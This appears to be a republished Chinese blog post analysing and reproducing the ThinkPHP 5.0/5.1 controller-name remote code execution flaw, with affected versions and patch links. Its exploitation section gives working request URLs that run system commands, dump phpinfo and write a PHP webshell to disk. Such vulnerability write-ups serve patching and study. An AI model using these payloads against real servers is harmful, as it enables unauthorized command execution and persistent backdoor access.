ThinkPHP 5.x远程命令执行漏洞分析与复现

Posted 方方和圆圆

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ThinkPHP 5.x远程命令执行漏洞分析与复现相关的知识,希望对你有一定的参考价值。

0x00 前言

  Thinkphp官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

0x01 影响范围

  • ThinkPHP 5.0.5-5.0.22
  • ThinkPHP 5.1.0-5.1.30

0x02 漏洞分析

  Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

  Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

  路由信息中controller的部分进行了过滤,可知问题出现在路由调度时

  关键代码:

 

 

  在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\\符号来调用任意类方法。

 

 

  其中使用了$this->app->controller方法来实例化控制器,然后调用实例中的方法。跟进controller方法:

 

  其中通过parseModuleAndClass方法解析出$module和$class,然后实例化$class。

 

 

  而parseModuleAndClass方法中,当$name以反斜线\\开始时直接将其作为类名。利用命名空间的特点,如果可以控制此处的$name(即路由中的controller部分),那么就可以实例化任何一个类。

接  着,我们再往回看路由解析的代码。其中route/dispatch/Url.php:: parseUrl方法调用了route/Rule.php:: parseUrlPath来解析pathinfo中的路由信息

 

 

  代码比较简单,就是使用/对$url进行分割,未进行任何过滤。

 

  其中的路由url从Request::path()中获取

 

 

  由于var_pathinfo的默认配置为s,我们可利用$_GET[\'s\']来传递路由信息,也可利用pathinfo来传递,但测试时windows环境下会将$_SERVER[\'pathinfo\']中的\\替换为/。结合前面分析可得初步利用代码如下:index.php?s=index/\\namespace\\class/method ,这将会实例化\\namespace\\class类并执行method方法。

 

0x03漏洞利用

  环境源码:https://github.com/vulnspy/thinkphp-5.1.29

  本地环境:thinkphp5.0.15+php5.6n+ apache2.0

http://www.thinkphp.cn/donate/download/id/1125.html

 

  1.利用system函数远程命令执行

  http://localhost:9096/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 

 

  2.通过phpinfo函数写出phpinfo()的信息

  http://localhost:9096/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

 

  3.写入shell:

http://localhost:9096/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

  或者http://localhost:9096/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo \'ok\';?>

以上是关于ThinkPHP 5.x远程命令执行漏洞分析与复现的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP 5.x远程命令执行漏洞

漏洞预警 | ThinkPHP 5.x远程命令执行漏洞

Thinkphp 5.x全版本任意代码执行 复现

ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现

ThinkPHP - 漏洞 - 汇总

thinkphp5.x命令执行漏洞复现及环境搭建